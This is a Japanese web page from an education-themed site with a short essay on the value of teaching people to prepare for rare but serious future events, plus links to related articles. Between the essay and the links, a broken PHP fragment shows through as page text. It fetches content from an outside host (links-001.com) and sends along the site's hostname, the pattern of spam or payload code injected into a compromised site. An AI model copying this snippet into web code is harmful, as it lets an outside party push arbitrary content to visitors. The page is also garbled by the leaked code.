banner

来ないかもしれない未来のために備えることを教育する意義

banner  誰でも、高い確率で起こると自覚していることに対しては、備えます。しかし、めったに起こらないだろうことには、あまり備えません。ある意味、それが健全かもしれません。しかし、起こった時に深刻な損害をもたらすことに対してはどうでしょうか。自分ごととして考えたならば、備えるかもしれません。しかし、この自分ごととして考えるということが、案外たいへんなのです。 誰でも、それなりに普段の生活が大変です。そんな中、普段の生活で起こる可能性が低いことは、自然と後回しにします。自分ごととして考える以前に、そのことについて調べたり考えたりする時間自体がとられないのです。そこで、教育の出番です。滅多に無いことでも重要なことや起これば深刻な事態になることを、他人の力によって教わるのです。それによって、強制的に時間がとられますし、その教わっている間だけでも考えます。それを繰り返すことによって、来ないかもしれない未来のことを前向きに取り組むようになります。それこそが、来ない可能性のある未来のために備えることを教育する意義です。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

関連情報一覧

banner
 現在、日本は核家族で世帯を営んでいます。1部では2世帯同居の形もありますが、まだまだ核家族が主体で

家族の未来について教育するということ

banner
 生活習慣は、生きていく基盤です。これが乱れますと、生活習慣病になったり、不眠症になったりします。自

自分の未来の生活習慣について教育する意義

banner
世界の人たちに愛されるような立派な国を作るために何よりも大切になることは、その国の子供たちに正しい教

未来を作るための教育

Copyright(c) 教育 未来 All Rights Reserved.